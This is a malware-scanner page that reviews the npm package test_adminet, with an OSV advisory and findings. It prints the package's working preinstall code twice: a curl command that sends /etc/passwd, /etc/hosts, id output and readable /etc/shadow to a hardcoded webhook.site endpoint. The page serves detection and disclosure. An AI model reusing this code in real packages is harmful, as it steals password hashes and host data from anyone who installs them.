registry  /  test_adminet  /  99.9.9

test_adminet@99.9.9

AI Security Review

scanned 2h ago · by lpm-firewall-ai

Installation triggers `index.js` before package use. It executes a shell command that collects local account and system data, then exfiltrates it to a third-party webhook.

Static reason
High-risk behavior combination matched malicious policy.; source fingerprint signature matched known malicious package; routed for review
Trigger
npm installation via the `preinstall` lifecycle hook
Impact
Exposes host identity, account metadata, and potentially password-hash data to an external endpoint.
Mechanism
install-time shell collection and HTTP POST exfiltration
Attack narrative
On npm installation, the `preinstall` hook executes `index.js`. That file uses `child_process.exec` to run `curl`, gathering `/etc/passwd`, `/etc/hosts`, `id`, and `/etc/shadow` when readable. It base64-encodes the data and sends it to a hard-coded `webhook.site` URL, with username and hostname embedded in the request path.
Rationale
Direct source inspection confirms unconsented install-time host-data collection and external exfiltration. This is concrete malicious behavior, not a benign package capability.
Evidence
package.jsonindex.js
Network endpoints1
webhook.site/d5968c3d-d0d7-46c4-9305-a726b24fce9c/test_adminest/$(whoami)/$(hostname)/

OSV Corroboration

OpenSSF/OSV
Advisory
MAL-2026-10509
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in test_adminet (npm)
Details
The package's package.json declares a preinstall hook that runs index.js. On npm install, index.js uses child_process.exec to curl-POST installer identifiers ($(whoami), $(hostname), id output) together with the contents of /etc/passwd, /etc/hosts, and /etc/shadow (base64-encoded and stuffed into the User-Agent header) to a hardcoded webhook.site endpoint. The /etc/shadow read attempts to harvest local password hashes; if the install runs as root (common in CI/Docker), hashes are transmitted off-host. Behavior fires automatically on default npm install with no user interaction.

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `package.json` runs `node index.js` in `preinstall`.
  • `index.js` executes a shell command through `child_process.exec`.
  • The command collects `/etc/passwd`, `/etc/hosts`, `id`, and readable `/etc/shadow`.
  • Collected output is base64-encoded and POSTed to `webhook.site`.
  • The external request includes the local username and hostname in its URL.
Evidence against
    Behavioral surface
    Source
    ChildProcess
    Supply chain
    HighEntropyStringsUrlStrings
    ManifestNo manifest risk signals triggered.
    scanned 1 file(s), 492 B of source, external domains: webhook.site

    Source & flagged code

    5 flagged · loading source
    package.jsonView file
    scripts.preinstall = node index.js
    High
    Install Time Lifecycle Scripts

    Package defines install-time lifecycle scripts.

    package.jsonView on unpkg
    index.jsView file
    1const { exec } = require("child_process"); L2: const command = ` L3: curl -X POST "https://webhook.site/d5968c3d-d0d7-46c4-9305-a726b24fce9c/test_adminest/$(whoami)/$(hostname)/" \ L4: -A "$( (cat /etc/passwd /etc/hosts && id && { [ -r /etc/shadow ] && cat /etc/shadow || echo 'No shadow access'; } | base64 | tr '\\n' '.')" \ L5: -s -o /dev/null L6: `; L7: exec(command, (error, stdout, stderr) => { L8: if (error) {
    Critical
    Command Output Exfiltration

    Source executes local commands and sends command output to an external endpoint.

    index.jsView on unpkg · L1
    1Trigger-reachable chain: scripts.preinstall -> index.js L1: const { exec } = require("child_process"); L2: const command = ` L3: curl -X POST "https://webhook.site/d5968c3d-d0d7-46c4-9305-a726b24fce9c/test_adminest/$(whoami)/$(hostname)/" \ L4: -A "$( (cat /etc/passwd /etc/hosts && id && { [ -r /etc/shadow ] && cat /etc/shadow || echo 'No shadow access'; } | base64 | tr '\\n' '.')" \ L5: -s -o /dev/null L6: `; L7: exec(command, (error, stdout, stderr) => { L8: if (error) {
    Critical
    Trigger Reachable Dangerous Capability

    A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

    index.jsView on unpkg · L1
    1const { exec } = require("child_process"); L2: const command = `
    High
    Child Process

    Package source references child process execution.

    index.jsView on unpkg · L1
    matchType = malicious_source_fingerprint_signature signature = e2111a9fe771a61a signatureType = suspicious_hashes sourceLabel = Datadog matchedPackage = @tezign/html-webpack-plugin@1.0.3 matchedPath = index.js matchedIdentity = npm:[redacted]:1.0.3 similarity = 1.000 shingleOverlap = 1 summary = Datadog malicious npm corpus sample: samples/npm/malicious_intent/@tezign@html-webpack-plugin/1.0.3/2025-11-19-@tezign_html-webpack-plugin-v1.0.3.zip
    High
    Known Malware Source Fingerprint Signature

    Source fingerprint signature matches a known malicious package signature; route for source-aware review.

    index.jsView on unpkg

    Findings

    2 Critical3 High1 Medium3 Low
    CriticalCommand Output Exfiltrationindex.js
    CriticalTrigger Reachable Dangerous Capabilityindex.js
    HighInstall Time Lifecycle Scriptspackage.json
    HighChild Processindex.js
    HighKnown Malware Source Fingerprint Signatureindex.js
    MediumStructural Risk Force Deep Review
    LowScripts Present
    LowHigh Entropy Strings
    LowUrl Strings